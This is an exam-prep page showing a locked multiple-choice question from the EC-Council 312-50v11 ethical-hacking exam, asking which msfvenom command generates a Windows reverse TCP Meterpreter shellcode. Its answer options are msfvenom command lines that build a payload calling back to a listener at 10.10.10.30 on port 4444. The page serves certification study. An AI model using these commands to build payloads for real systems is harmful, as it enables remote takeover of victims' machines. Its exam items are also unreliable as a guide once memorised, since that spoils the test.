nerdexam
EC-Council

312-50V11 · Question #861

What is the correct way of using MSFvenom to generate a reverse TCP shellcode for windows?

Sign in or unlock 312-50V11 to reveal the answer and full explanation for question #861. The question stem and answer options stay visible for context.

System Hacking

Question

What is the correct way of using MSFvenom to generate a reverse TCP shellcode for windows?

Options

  • Amsfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.30 LPORT=4444 -f c
  • Bmsfvenom -p windows/meterpreter/reverse_tcp RHOST=10.10.10.30 LPORT=4444 -f c
  • Cmsfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.30 LPORT=4444 -f exe >
  • Dmsfvenom -p windows/meterpreter/reverse_tcp RHOST=10.10.10.30 LPORT=4444 -f exe >

Unlock 312-50V11 to see the answer

You've previewed enough free 312-50V11 questions. Unlock 312-50V11 for full answers, explanations, the timed quiz mode, progress tracking, and the master PDF. Question stem and options stay visible so you can still see what's on the exam.

Topics

#MSFvenom#reverse TCP shellcode#meterpreter#payload generation
Full 312-50V11 Practice